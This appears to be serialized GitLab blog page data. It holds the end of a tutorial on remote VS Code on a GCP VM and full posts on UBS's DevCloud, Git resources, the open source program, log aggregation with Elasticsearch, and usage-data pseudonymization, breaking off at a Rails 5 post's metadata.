successfully completed before you can perform Step 2 of the next section.\n\n### Connect to your VM from your local Mac laptop\n\nNow that you have an instance of VS Code running on a Linux VM on GCP, you need to configure your Mac laptop to be able to act as a client to the remote VM. Follow these steps:\n\n1. To connect to the remote VS Code from your Mac, you must first install `XQuartz` on your Mac. You can execute the following command on your Mac to install it:\n\n```\nbrew install xquartz\n```\nOr, you can follow the instructions from the following [tutorial](https://und.edu/research/computational-research-center/tutorials/mac-x11.html) from the University of North Dakota.\n\nAfter the pipeline for project `vscvmsetup` successfully executes to completion (pipeline you manually executed in the previous section), you can connect to the remote VS Code as follows:\n\n2. Launch `XQuartz` on your Mac (it should be located in your Applications folder). Its launching should open up an `xterm` on your Mac. If it does not, then you can select **Applications > Terminal** from the `XQuartz` top menu. \n3. On the `xterm`, enter the following command:\n\n```\ngcloud compute ssh --zone \"[GCP zone]\" \"[name of your VM]\" --project \"[GCP project]\" --ssh-flag=\"-Y\"\n```\nWhere:\n\n- `[VM name]` is the name of the VM you created in project `gcpvmlnxvsc`. Its value should be the same as the `gcp_project` variable.\n- `[GCP zone]` is the zone where the VM is running. Its value should be the same as the `gcp_vmname` variable.\n- `[GCP project]` is the name of your GCP project assigned name. Its value should be the same as the `gcp_project` variable.\n\n***Note: If you have not installed the Google Cloud CLI, please do so by following the [Google documentation](https://cloud.google.com/sdk/docs/install).***\n\n4. If you have not used SSH on your Mac before, you may not have a `.ssh` in your `HOME` directory. If this is the case, you will be asked if you would like to continue with the creation of this directory. Answer **Y**.\n\n5. Next, you will be asked to enter the same password twice to generate a public/private key. Enter the same password you used when defining the variable `vm_pwd` in the required configuration above.\n\n6. Once the SSH key is done propagating, you will need to enter the password again two times to log in to the VM.\n\n7. You should now be logged in to the VM.\n\n### Create a personal access token\n\nThe assumption here is that you already have a GitLab project that you would want to open from and work on the remote VS Code. To do this, you will need to clone your GitLab project from the VM. First, you will be using a personal access token (PAT) to clone your project.\n\n1. Head over to your GitLab project (the one that you'd like to open from the remote VS Code).\n2. From your GitLab project, create a [PAT](https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html#create-a-personal-access-token), name it `pat-gcpvm` and ensure that it has the following scopes: `read_repository`, `write_repository`, `read_registry`, `write_registry`, and `ai_features`\n3. Save the generated PAT somewhere safe; you will need it later.\n\n### Clone the read_repository\n\n1. On your local Mac, from the `xterm` where you are logged on to the remote VM, enter the following command:\n\n```\ngit clone https://[your GitLab username]:[personal_access_token]@gitlab.com/[GitLab project name].git \n```\n\nWhere:\n\n- `[your GitLab username]` is your GitLab handle.\n- `[personal_access_token]` is the PAT you created in the previous section.\n- `[GitLab project name]` is the name of the project that contains the GitLab Code Suggestions test cases.\n\n## Launch Visual Studio Code\n\n1. From the `xterm` where you are logged in to the VM, enter the following command:\n\n```\ncode\n```\n\nWait for a few seconds and Visual Studio Code will appear on your Mac screen.\n\n2. From the VS Code menu, select **File > Open Folder...\"\n3. In the File chooser, select the top-level directory of the GitLab project you cloned in the previous section\n\nThat's it! You're ready to start working on your cloned GitLab project using the VS Code that you installed on a remote Linux-based VM.\n\n### Troubleshooting\n\nWhile using the remotely installed VS Code from your local Mac, you may encounter a few issues. In this section, we provide guidance on how to mitigate them.\n\n#### Keyboard keys not mapped correctly\n\nIf, while running VS Code, you are having issues with your keyboard keys not being mapped correctly, e.g. letter e is backspace, letter r is tab, letter s is clear line, etc., do the following:\n\n1. In VS Code, select **File > Preferences > Settings**.\n1. Search for \"keyboard\". If having issues with the letter e, then search for \"board\". Click on the \"Keyboard\" entry under \"Application.\"\n1. Ensure that the Keyboard Dispatch is set to \"keyCode.\"\n1. Restart VS Code.\n1. If you need further help, this is a good resource for [keyboard problems](https://github.com/microsoft/vscode/wiki/Keybinding-Issues#troubleshoot-linux-keybindings).\n\n#### Error loading webview: Error\n\nIf while running VS Code, you get a message saying:\n\n\"Error loading webview: Error: Could not register service worker: InvalidStateError: Failed to register a ServiceWorker: The document is in an invalid state.\"\n\n1. Exit VS Code and then enter this cmd from the `xterm` window:\n\n`killall code`\n\nYou may need to execute this command two or three times in a row to kill all VS Code processes.\n\n2. Ensure that all VS Code-related processes are gone by entering the following command from the `xterm` window:\n\n`ps -ef | grep code`\n\n3. Once all the VS Code-related processes are gone, restart VS Code by entering the following command from the `xterm` window:\n\n`code`\n\n#### Some useful commands to debug SSH\n\nHere are some useful commands to run on the VM that can help you debug SSH issues:\n\n1. To get the status, location and latest event of sshd:\n\n`sudo systemctl status ssh`\n\n2. To see the log of sshd:\n\n`journalctl -b -a -u ssh`\n\n3. To restart to SSH daemon:\n\n`sudo systemctl restart ssh.service`\n\nOr\n\n`sudo systemctl restart ssh`\n\n4. To start a root shell:\n\n`sudo -s`\n\n## Get started\n\nThis article described how to:\n- instantiate a Linux-based VM on GCP\n- install VS Code and dependencies on the remote VM\n- clone an existing GitLab project of yours in the remote VM\n- open your remotely cloned project from the remotely installed VS Code\n\nAs a result, you can basically use your laptop as a thin client that accesses a remote server, where all the work takes place.\n\n> The automation to get all these parts in place was done by GitLab. Sign up for a [free 30-day GitLab Ultimate trial](https://about.gitlab.com/free-trial/) to get started today!",[845,752,9],{"slug":5022,"featured":91,"template":689},"tutorial-install-vs-code-on-a-cloud-provider-vm-and-set-up-remote-access","content:en-us:blog:tutorial-install-vs-code-on-a-cloud-provider-vm-and-set-up-remote-access.yml","Tutorial Install Vs Code On A Cloud Provider Vm And Set Up Remote Access","en-us/blog/tutorial-install-vs-code-on-a-cloud-provider-vm-and-set-up-remote-access.yml","en-us/blog/tutorial-install-vs-code-on-a-cloud-provider-vm-and-set-up-remote-access",{"_path":5028,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5029,"content":5035,"config":5040,"_id":5042,"_type":14,"title":5043,"_source":16,"_file":5044,"_stem":5045,"_extension":19},"/en-us/blog/ubs-gitlab-devops-platform",{"title":5030,"description":5031,"ogTitle":5030,"ogDescription":5031,"noIndex":6,"ogImage":5032,"ogUrl":5033,"ogSiteName":673,"ogType":674,"canonicalUrls":5033,"schema":5034},"How UBS created their own DevOps platform using GitLab","How GitLab helped power more than a million builds in six months on UBS DevCloud.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749665839/Blog/Hero%20Images/devops.png","https://about.gitlab.com/blog/ubs-gitlab-devops-platform","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How UBS created their own DevOps platform using GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sara Kassabian\"}],\n        \"datePublished\": \"2021-08-04\",\n      }",{"title":5030,"description":5031,"authors":5036,"heroImage":5032,"date":5037,"body":5038,"category":801,"tags":5039},[927],"2021-08-04","\n\nUBS, the largest truly global wealth manager, uses GitLab to power DevCloud, a single [DevOps platform](/solutions/devops-platform/) that allows for a cloud-based, service-oriented, software development lifecycle.\n\n\"GitLab is a fundamental part of DevCloud,\" said [Rick Carey](https://www.bloomberg.com/profile/person/20946258), Group Chief Technology Officer at UBS. \"We wouldn't be able to have that seamless experience without GitLab. It allowed us to pull ahead of many of our competitors, and break down the barriers between coding, testing, and deployment.\"\n\nDuring GitLab Virtual Commit 2021, Rick and [Eric Johnson](/company/team/#edjdev), Chief Technology Officer at GitLab, talked about how building DevCloud on GitLab's DevOps Platform allowed UBS to increase their development velocity, lower their infrastructure costs, and increase collaboration between engineers and non-engineering teams worldwide.\n\n## How engineers used DevCloud to collaborate during UBS Hackathon\n\nThe annual [UBS Hackathon](https://www.ubs.com/global/en/our-firm/what-we-do/technology/2020/hackathon-2020.html), which typically brings together engineers from around the world in one room, went virtual in 2020 due to the COVID-19 pandemic. UBS did a soft launch of the DevCloud platform during the 2020 Hackathon to have a truly global development and seamless team experience among the more than 500 participants dispersed worldwide.\n\n\"It was hard to pick a winner, because nearly every program and team built something absolutely incredible in such a short amount of time,\" said Rick. \"They got so much done that even while chatting with each other, they said, 'I can't believe how easy it is to get this done.'\n\nOnce this Hackathon was successful, we knew that we were going to be able to migrate the rest of our engineers to DevCloud.\"\n\n## Open source collaboration benefitted UBS and GitLab\n\n\"I must say it's uncommon in my experience to see such a large organization let alone one in such a compliance-driven industry as finance take on such a large project and deliver it on time,\" Eric said.\n\nRick attributes part of that success to GitLab's commitment to open source collaboration, which allowed UBS to turn to GitLab team members with questions.\n\n\"In an open source model, every time there was a gap, or an issue, or something we just needed your help with, we could reach out to GitLab and say, 'Can we work on this together? Is there a way to improve this?'\", said Rick. \"That's the value, and that's one of the reasons we went with GitLab.\"\n\nIt wasn't a one-way relationship. Eric said that GitLab learned a lot about compliance and risk processes that are unique to the financial sector by collaborating on open source projects with UBS.\n\n\"Collaboration is one of the GitLab's core values – which was key to this project. We set common goals. We're in constant communication, and we're always working together to remove roadblocks. Working with UBS's engineers is a truly agile experience,\" said Eric.\n\nGitLab forums have a lot of contributions from UBS team members, and both UBS and GitLab are members of open source communities such as the Fintech Open Source Foundation (FINOS) and Cloud Native Computing Foundation (CNCF).\n\n## How adopting DevCloud paid off for UBS\n\nOne of the key messages for why adopting a single DevOps platform such as GitLab or DevCloud benefits engineering teams is the productivity pay-off – for engineers and non-engineers alike.\n\nSimilar to GitLab, which enables simple asynchronous collaboration between team members, DevCloud was built with engineers in mind but so everyone can contribute. Rick said that one of the best pieces of feedback he got on DevCloud was from someone on the business side of UBS, who wanted to do some development projects but struggled with other tools.\n\n\"He said, 'Oh, that's DevCloud? I love DevCloud,'\" said Rick.\n\nIn the roughly six months since UBS launched DevCloud, there have been more than 12,000 users and more than one million successful builds.\n\n## What's next?\n\nIn June 2021, [GitLab acquired machine learning company UnReview](/press/releases/2021-06-02-gitlab-acquires-unreview-machine-learning-capabilities.html) which has allowed us to improve our machine learning capabilities as part of our DevOps Platform. Eric said that by practicing applied machine learning, specifically for code review, GitLab should be able to balance review workloads across teams to increase efficiency.\n\nKeeping all the DevOps activities in a single application makes it easier to extract insights throughout the software development lifecycle. By adding machine learning to a DevOps Platform such as GitLab or DevCloud, teams can not only derive data from past activities, but start to predict the future.\n\n \"We were very impressed by UBS's development culture,\" said Eric. \"It is very complimentary to our own, and we look forward to our continued partnership.\"\n\n## More of a video person?\n\nThis conversation was part of GitLab Virtual Commit 2021. Watch the video below to see the full conversation between Eric and Rick.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube-nocookie.com/embed/Tof-7fDultw\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n",[685,9,1036,779],{"slug":5041,"featured":6,"template":689},"ubs-gitlab-devops-platform","content:en-us:blog:ubs-gitlab-devops-platform.yml","Ubs Gitlab Devops Platform","en-us/blog/ubs-gitlab-devops-platform.yml","en-us/blog/ubs-gitlab-devops-platform",{"_path":5047,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5048,"content":5053,"config":5058,"_id":5060,"_type":14,"title":5061,"_source":16,"_file":5062,"_stem":5063,"_extension":19},"/en-us/blog/ultimate-git-guide",{"title":5049,"description":5050,"ogTitle":5049,"ogDescription":5050,"noIndex":6,"ogImage":1069,"ogUrl":5051,"ogSiteName":673,"ogType":674,"canonicalUrls":5051,"schema":5052},"Our ultimate guide to Git","Open source pioneer Git is 15 years old. Here is our guide to making the most of it.","https://about.gitlab.com/blog/ultimate-git-guide","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Our ultimate guide to Git\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Valerie Silverthorne\"}],\n        \"datePublished\": \"2020-04-20\",\n      }",{"title":5049,"description":5050,"authors":5054,"heroImage":1069,"date":5055,"body":5056,"category":10,"tags":5057},[1273],"2020-04-20","\n\n_Git, a [source code management](/solutions/source-code-management/) tool and arguably the most famous open source software project, turned 15 in April 2020. That’s a milestone no matter how you look at it, and not surprisingly our team has a lot to say about Git. From a look back at the past to newbie-friendly explanations, we’ve pulled together the ultimate guide to Git (as told by GitLab)._\n\n## Meet Git\n\nIf you’re just getting started with software development, you’ll have questions. Luckily, we have answers including background on developer Linus Torvalds in [\"A beginner’s guide to Git\"](/blog/beginner-git-guide/).\n\n![Linus Torvalds](https://about.gitlab.com/images/blogimages/linustorvalds.png){: .shadow.small.center}\n\nThe godfather of Git, Linus Torvalds.\n{: .note.text-center}\n\n## Get more out of Git\n\nWe all spend a ton of time working with Git so it makes sense to polish up your workflow so it shines. We’ve [got the lowdown](/blog/15-git-tips-improve-workflow/) on Git blame, .gitignore, how to pull frequently, and more.\n\n## Missed Git Merge?\n\nNot everyone was lucky enough to attend the actual, in-person Git birthday party. Here’s our [first-person account](/blog/git-merge-fifteen-year-git-party/) of the festivities, complete with lots of pictures.\n\n![birthday balloons](https://about.gitlab.com/images/blogimages/balloons.jpg){: .shadow.small.center}\n\n## Why Git flow doesn’t always go with the flow\n\nYou can have too much of a good thing, and if you doubt that, perhaps it’s because you haven’t yet encountered Git flow. Although designed to streamline development it ends up creating extra effort – too many branches and too much task switching. Never fear, though, [we have a solution](/blog/what-is-gitlab-flow/).\n\n## Git goes (really) big\n\nWhen Git was invented 15 years ago, video streaming (and gaming) weren’t even on the horizon. Git can handle those huge files but there’s one hiccup: You can’t just download the one you need, Git insists you download all of them. Enter Git Partial Clone which speeds up the process so you can just grab the file you need. [Here’s how it works](/blog/partial-clone-for-massive-repositories/).\n\n## GitLab and GitHub on Git\n\nOur senior developer evangelist [Brendan O’Leary](/company/team/#brendan) did a bit of a point counter-point about Git and its past and future with GitHub’s distinguished software engineer [Jeff King](https://www.linkedin.com/in/pefflinkedin/) on [infoq.com](https://www.infoq.com/news/2020/04/git-fifteen-anniversary-qa/).\n\n## Never say never\n\nBrendan also admitted that 15 years ago, he was never ever going to use Git. Ahem. Feel free to enjoy [his mea culpa](https://www.computerweekly.com/blog/Open-Source-Insider/GitLab-guru-15-years-later-were-still-learning).\n\n## Dive into GitOps\n\nYou’ve heard the term, now is the time to understand what [GitOps](/solutions/gitops/) means and how it can work – well – in real world applications. Here’s what you need to know about [continuous delivery to production](/blog/why-gitops-should-be-workflow-of-choice/).\n\nImage by [Adi Gold](https://unsplash.com/@adigold1) on [Unsplash](https://www.unsplash.com)\n{: .note}\n",[751,9,1099],{"slug":5059,"featured":6,"template":689},"ultimate-git-guide","content:en-us:blog:ultimate-git-guide.yml","Ultimate Git Guide","en-us/blog/ultimate-git-guide.yml","en-us/blog/ultimate-git-guide",{"_path":5065,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5066,"content":5072,"config":5078,"_id":5080,"_type":14,"title":5081,"_source":16,"_file":5082,"_stem":5083,"_extension":19},"/en-us/blog/ultimate-perks-for-open-source-projects",{"title":5067,"description":5068,"ogTitle":5067,"ogDescription":5068,"noIndex":6,"ogImage":5069,"ogUrl":5070,"ogSiteName":673,"ogType":674,"canonicalUrls":5070,"schema":5071},"Public open source projects are eligible for Ultimate tier features","GitLab's Open Source Program offers top-tier functionality and 50,000 CI pipeline minutes, for free. Learn more about applying.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667457/Blog/Hero%20Images/open_source_program_blog_image.jpg","https://about.gitlab.com/blog/ultimate-perks-for-open-source-projects","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Public open source projects are eligible for Ultimate tier features\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Orit Golowinski\"}],\n        \"datePublished\": \"2022-02-04\",\n      }",{"title":5067,"description":5068,"authors":5073,"heroImage":5069,"date":5075,"body":5076,"category":930,"tags":5077},[5074],"Orit Golowinski","2022-02-04","\n> **2022-07-28 UPDATE:** As of 2022-07-01, all public open source projects on the Free tier have to apply to the Open Source program to continue receiving GitLab Ultimate benefits. In-app notifications informing impacted users of the change were active from 2022-04-18 through 2022-07-01. Please refer to the [FAQ](/pricing/faq-efficient-free-tier/#public-projects-on-gitlab-saas-free-tier) for more details.\n\nGitLab believes in a world where everyone can contribute and we like to support those who share our mission.\n\nGitLab exists today in large part thanks to the work of hundreds of thousands of open source contributors around the world. To give back to this community, the [GitLab for Open Source Program](/solutions/open-source/) was created to help open source teams be more efficient, secure, and productive by allowing them to use GitLab’s [top tier](/pricing/) capabilities.\n\nOpen source organizations have to meet the program requirements and actively apply in order to qualify. \n\nRequirements include:\n\n* **OSI-approved open source license**: All of the code you host in this GitLab group must be published under [OSI-approved open source licenses](https://opensource.org/licenses/category)\n* **Not seeking profit**: Your organization must not seek to make a profit through services or by charging for higher tiers. Accepting donations to sustain your efforts is ok. [Read more about this requirement here](/handbook/marketing/developer-relations/community-programs/opensource-program/#who-qualifies-for-the-gitlab-for-open-source-program).\n* Publicly visible: Your GitLab.com group or self-managed instance and your source code must be [publicly visible and publicly available](https://docs.gitlab.com/ee/user/public_access.html).\n\n[Learn more and apply](/solutions/open-source/join/) to the GitLab for Open Source Program.\n\n**Note**: Newly created public projects will no longer automatically receive the Ultimate tier benefits as of 2022-02-17, more details in [this FAQ entry](/pricing/faq-efficient-free-tier/#public-projects-on-gitlab-saas-free-tier). In order to receive the benefits, you will need to [apply](#how-to-apply) to the GitLab for Open Source Program.\n\n## Why apply to the GitLab for Open Source Program?\n\nThe GitLab for Open Source Program gives access to unlimited seats per license to features of [GitLab Ultimate](/pricing/ultimate/) (SaaS or Self-Managed), including 50,000 CI/CD minutes, for free to qualifying open source projects. GitLab Ultimate includes features that allow organization-wide security, compliance and planning. Some key features include:\n\n- [Multi-level Epics](https://docs.gitlab.com/ee/user/group/epics/)\n- [Portfolio-level Roadmaps](https://docs.gitlab.com/ee/user/group/roadmap/)\n- [Requirements Management](/direction/plan/#requirements-management)\n- [Compliance pipeline configuration](https://docs.gitlab.com/ee/user/project/settings/#compliance-pipeline-configuration)\n- [Chain of custody report](https://docs.gitlab.com/ee/user/compliance/compliance_report/#chain-of-custody-report)\n- [Vulnerability Database](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/#contributing-to-the-vulnerability-database)\n- [Dependency Scanning](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/)\n- and much more...\n\nTo see a complete list of features, see our\n[Feature Comparison between tiers](/pricing/feature-comparison/) page. \n\n* Free top-tier accounts do not include support. However, you can purchase [support](/support/) for 95% off, at $4.95 per user per month.\n* Your program membership needs to be renewed annually. If you do not renew, [your account will be downgraded](/pricing/licensing-faq/#what-happens-when-my-subscription-is-about-to-expire-or-has-expired).\n* Acceptance into the GitLab for Open Source Program is at GitLab’s sole discretion, and we reserve the right to terminate the Program, or change the [Program requirements](/solutions/open-source/join/#requirements) at any time.\n\nIf you have any additional questions regarding this program, feel free to reach us at [opensource@gitlab.com](mailto:opensource@gitlab.com).\n\n## How to apply\n\n1. Set up a GitLab account. You’ll need to have a GitLab group already set up for your open source project or organization through a Free account or Free Trial. For help setting up a GitLab group, please see the relevant [FAQ](/solutions/open-source/join/#faqs). If you're considering a migration, you do not need to have finished the migration before applying to our program. You will need at least one project (repo) set up under your GitLab group to comply with our requirements.\n1. Take screenshots. During the application process, you’ll need to provide 3 screenshots of your project. We suggest taking them in advance, since you’ll need to submit them on page two of the application form.\n1. Fill out the [form](/solutions/open-source/join/#application) and submit it. \n\nApplications are reviewed and a response to your request can be expected within 10 business days. You may be asked to provide additional information.\n\nCover image by [Clay Banks](https://unsplash.com/photos/N3SsG7xR-Dg) on [Unsplash](https://unsplash.com)\n{: .note}\n",[9,708,685],{"slug":5079,"featured":6,"template":689},"ultimate-perks-for-open-source-projects","content:en-us:blog:ultimate-perks-for-open-source-projects.yml","Ultimate Perks For Open Source Projects","en-us/blog/ultimate-perks-for-open-source-projects.yml","en-us/blog/ultimate-perks-for-open-source-projects",{"_path":5085,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5086,"content":5092,"config":5098,"_id":5100,"_type":14,"title":5101,"_source":16,"_file":5102,"_stem":5103,"_extension":19},"/en-us/blog/unifylogsmetrics",{"title":5087,"description":5088,"ogTitle":5087,"ogDescription":5088,"noIndex":6,"ogImage":5089,"ogUrl":5090,"ogSiteName":673,"ogType":674,"canonicalUrls":5090,"schema":5091},"How to integrate operation logs and metrics in GitLab","We've added Elasticsearch to our monitoring solution so you can see all your logs and metrics in one view. Here's a first look at this new feature, released in GitLab 12.8.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749666923/Blog/Hero%20Images/logs.png","https://about.gitlab.com/blog/unifylogsmetrics","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to integrate operation logs and metrics in GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Dov Hershkovitch\"}],\n        \"datePublished\": \"2020-03-03\",\n      }",{"title":5087,"description":5088,"authors":5093,"heroImage":5089,"date":5095,"body":5096,"category":801,"tags":5097},[5094],"Dov Hershkovitch","2020-03-03","\nLogging is one of the most powerful tools we have when trying to understand an application problem. It is a common practice – when things go wrong in production, one of the first requests is often, \"Please send me the logs!\" Raw logs contain useful information which can help pinpoint the root cause(s) of problems.\n\nBut using raw logs isn’t always a straightforward process. This is especially true, in a modern, distributed, and often ephemeral architecture. Ideally logs should be available across the entire application, be searchable and offer at least some access to past history. Historically aggregated logging solutions, if they existed, were only piecemeal. This forced developers to spend time and energy tracking down important log data which ultimately resulted in logs being far less useful than they could be.\n\nWith the [12.8 release](/releases/2020/02/22/gitlab-12-8-released/), to ease navigating through logs, we added [Elastic log Stack](https://docs.gitlab.com/ee/integration/advanced_search/elasticsearch.html) as our log aggregation tool and [Log Explorer](/releases/2020/02/22/gitlab-12-8-released/#explore-aggregated-logs) so you can interact with all your logs in one place.\n\nBut before we look at the logging capabilities, let’s take a step back and look at the big picture.\n\n##  Why monitoring matters\n\nAt GitLab, we aim to provide users with a complete [DevSecOps platform](/solutions/security-compliance/), delivered as a single application. To do so, we have divided the DevSecOps lifecycle into [ten different stages](/stages-devops-lifecycle/). The final Ops stage of the [DevOps](/topics/devops/) loop, [Monitor](/direction/monitor/), should occur right after the production environment is configured and the application deployed. This is a critical stage that should not be ignored.\n\nIn fact, it’s commonly believed in the DevOps world that no developer should ship code into production without monitoring, as it will help ensure an application behaves as expected. If something isn’t right, you will be alerted, (hopefully before your users start to complain). If you are thinking about ignoring monitoring, always remember _customers_ are the most expensive monitoring solution you can have.\n\n### Chasing Observability\n\nObservability is the ability to infer internal states of a system based on the system’s external outputs. Monitoring, on the other hand is the activity of observing the state of a system over time. To achieve observability, your system’s telemetries, including metrics, traces, and logs should all be available to enable proactive introspection and enable greater operational visibility. We believe that DevOps practitioners should have observability as a goal.\n\nGitLab’s vision for the Monitor category is to build a consolidated and integrated observability tool which will, over time, displace today's front-runner in modern observability. In pursuit of this vision and to focus our efforts, we are building our solutions with a cloud native first principle to solve the cloud native problem by selecting the open source products which are cloud native compatible. And, in fact, as part of GitLab’s [New Year’s gift for 2020](/blog/observability/) we're moving a big portion of the observability features – custom metrics, logging, tracing and alerting – from our proprietary codebase to the open source codebase this year.\n\n### Metrics & Traces\n\nToday, if you use GitLab to deploy your application into a Kubernetes cluster, with a push of a button you can deploy monitoring (via a Prometheus instance) into that cluster. [Prometheus](https://prometheus.io/) will automatically start collecting key metrics from your deployed application (such as latency, error rate, and throughput), and send it directly into GitLab UI. In addition to the out-of-the-box metrics and dashboard, it is possible to customize Prometheus directly from the GitLab UI (using PromQL) to collect any metric you desire and present it on a dashboard. You can set up a threshold, create an alert on it, and open an issue as a part of an incident management solution, all without leaving the GitLab UI.\n\nAs a developer, when there is an issue - you want to drill down to the exact function or micro service that is causing the trouble. GitLab uses [Jaeger](https://www.jaegertracing.io/), an end-to-end distributed tracing system for microservices-based distributed systems.\n\n## Get started with logs\n\nBefore the 12.8 release, existing Monitor stage users already had the ability to view pod logs directly from within the GitLab UI. However, this was done only through the available Kubernetes APIs. Viewing logs with the Kubernetes APIs is limited to allowing a log-tailing experience on a specific pod from multiple environments only.\n\nWith the 12.8 release any user can deploy Elastic stack - a specific flavor of Elasticsearch alongside a component called [Filebeat](https://www.elastic.co/beats/filebeat) - to a Kubernetes cluster with the push of a button, (similar to the way we deploy Prometheus). Once deployed, it automatically starts collecting all logs that are coming from the cluster and applications across the available environments (production, staging, testing, etc.) and they will be surfaced in the GitLab UI. In addition users can also navigate directly from the metric chart to the log explorer while preserving the context.\n\nThis is extremely critical when triaging an incident or validating the status of your service. In the cloud-native world aggregation of logs for observability becomes critical as logs are distributed across multiple pods and services. Using our new solution you will be able to get an aggregated view of all logs across multiple services and infrastructures, go back in time, search through logs, and more.\n\n##  What's next\n\nI hope you found this overview useful. To get started, download GitLab and read its documentation for more in-depth coverage of the functionality. One of the fastest ways to experience GitLab features is to use the .com version — which is a hosted GitLab.\n\nIf you would like to get in touch with the Monitoring team please comment and contribute to the linked [issues](https://gitlab.com/groups/gitlab-org/-/issues?scope=all&utf8=%E2%9C%93&state=opened&label_name[]=group%3A%3Aapm&label_name[]=Category%3ALogging) and [epics](https://gitlab.com/groups/gitlab-org/-/epics?scope=all&utf8=%E2%9C%93&state=opened&label_name[]=group%3A%3Aapm&label_name[]=Category%3ALogging) on this page. Sharing your feedback directly on GitLab.com is the best way to contribute to our strategy and vision.\n\nIf you're a GitLab user and have direct knowledge of your logging usage, we'd especially love to hear your use case(s).\n\nWatch my entire YouTube video on logging:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/hWclZHA7Dgw\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n",[1038,9,1099],{"slug":5099,"featured":6,"template":689},"unifylogsmetrics","content:en-us:blog:unifylogsmetrics.yml","Unifylogsmetrics","en-us/blog/unifylogsmetrics.yml","en-us/blog/unifylogsmetrics",{"_path":5105,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5106,"content":5111,"config":5116,"_id":5118,"_type":14,"title":5119,"_source":16,"_file":5120,"_stem":5121,"_extension":19},"/en-us/blog/updates-to-de-identifying-service-usage-data",{"title":5107,"description":5108,"ogTitle":5107,"ogDescription":5108,"noIndex":6,"ogImage":1090,"ogUrl":5109,"ogSiteName":673,"ogType":674,"canonicalUrls":5109,"schema":5110},"Updates to de-identifying Service Usage Data","GitLab is creating a process to pseudonymize directly identifiable Service Usage Data for SaaS customers. There will be no changes to the service data usage policy.","https://about.gitlab.com/blog/updates-to-de-identifying-service-usage-data","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Updates to de-identifying Service Usage Data\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2021-10-08\",\n      }",{"title":5107,"description":5108,"authors":5112,"heroImage":1090,"date":5113,"body":5114,"category":930,"tags":5115},[970],"2021-10-08","GitLab has been working on a process to intentionally limit our own ability to identify individual users from [Service Usage Data](/handbook/legal/privacy/customer-product-usage-information/) in order to protect user privacy even better. Earlier this year, we [solicited input](/blog/gitlab-plans-to-de-identify-service-usage-data/) on plans to de-identify GitLab’s Service Usage Data. We are now ready to move forward with a new system to de-identify SaaS usage data before it enters GitLab’s internal analytics environment.\n\n## What isn’t changing?\n\nThe service usage data policy for SaaS and Self-Managed remains unchanged.\n\n## What is changing?\n\nWith user privacy in mind, we are building a pseudonymization process to run against our SaaS service usage data.\n\nWe have determined that we do not need fully identifiable information anymore for our analytics environment, and as such we are pursuing this approach that will result in better privacy for GitLab users.\n\nWe’ll create a [one-way hash](https://gitlab.com/groups/gitlab-org/-/epics/6309#one-way-hashing) or [transform directly identifiable data](/handbook/product/product-intelligence-guide/#data-used-as-identifiers). This means that the data will be hashed at the collection layer before it is sent to our analytics environment.\n\nYou can read more details about our pseudonymization solution [here](https://gitlab.com/groups/gitlab-org/-/epics/6309). Once our pseudonymization solution is in place, we will update data we collect to ensure it follows the  solution. You can read more about what data we collect and its de-identification state [here](/handbook/product/product-intelligence-guide/#data-used-as-identifiers).\n\n## Timeline and implementation\n\nWe’re planning to roll out these changes in October 2021. Keep an eye on our [Product Intelligence roadmap](/handbook/product/product-intelligence-guide/service-usage-data-commitment/#roadmap) to monitor our progress. Once complete, we’ll update this blog post with the final status.\n\n## More information\n\nPlease find more information [about our privacy policy](/privacy/). Further details on how service usage data is used for product improvement can be found on our [Product Direction page](/direction/analytics/product-intelligence/). Also see  GitLab’s [analytics environment and SaaS Data Collection Catalog](/handbook/product/product-intelligence-guide/#saas-data-collection-catalog).\n\nPlease share your questions on the [community forum](https://forum.gitlab.com/t/updates-to-de-identifying-service-usage-data/59456).\n",[974,865,9],{"slug":5117,"featured":6,"template":689},"updates-to-de-identifying-service-usage-data","content:en-us:blog:updates-to-de-identifying-service-usage-data.yml","Updates To De Identifying Service Usage Data","en-us/blog/updates-to-de-identifying-service-usage-data.yml","en-us/blog/updates-to-de-identifying-service-usage-data",{"_path":5123,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5124,"content":5130,"config":5136,"_id":5138,"_type":14,"title":5139,"_source":16,"_file":5140,"_stem":5141,"_extension":19},"/en-us/blog/upgrade-to-rails5",{"title":5125,"description":5126,"ogTitle":5125,"ogDescription":5126,"noIndex":6,"ogImage":5127,"ogUrl":5128,"ogSiteName":673,"ogType":674,"canonicalUrls":5128,"schema":5129},"The road to Rails 5","Senior Backend Engineer Jan Provaznik shares some of the challenges we encountered when upgrading GitLab to Rails 5 – and how we overcame them.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749683399/Blog/Hero%20Images/road-to-rails-5.jpg","https://about.gitlab.com/blog/upgrade-to-rails5","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": 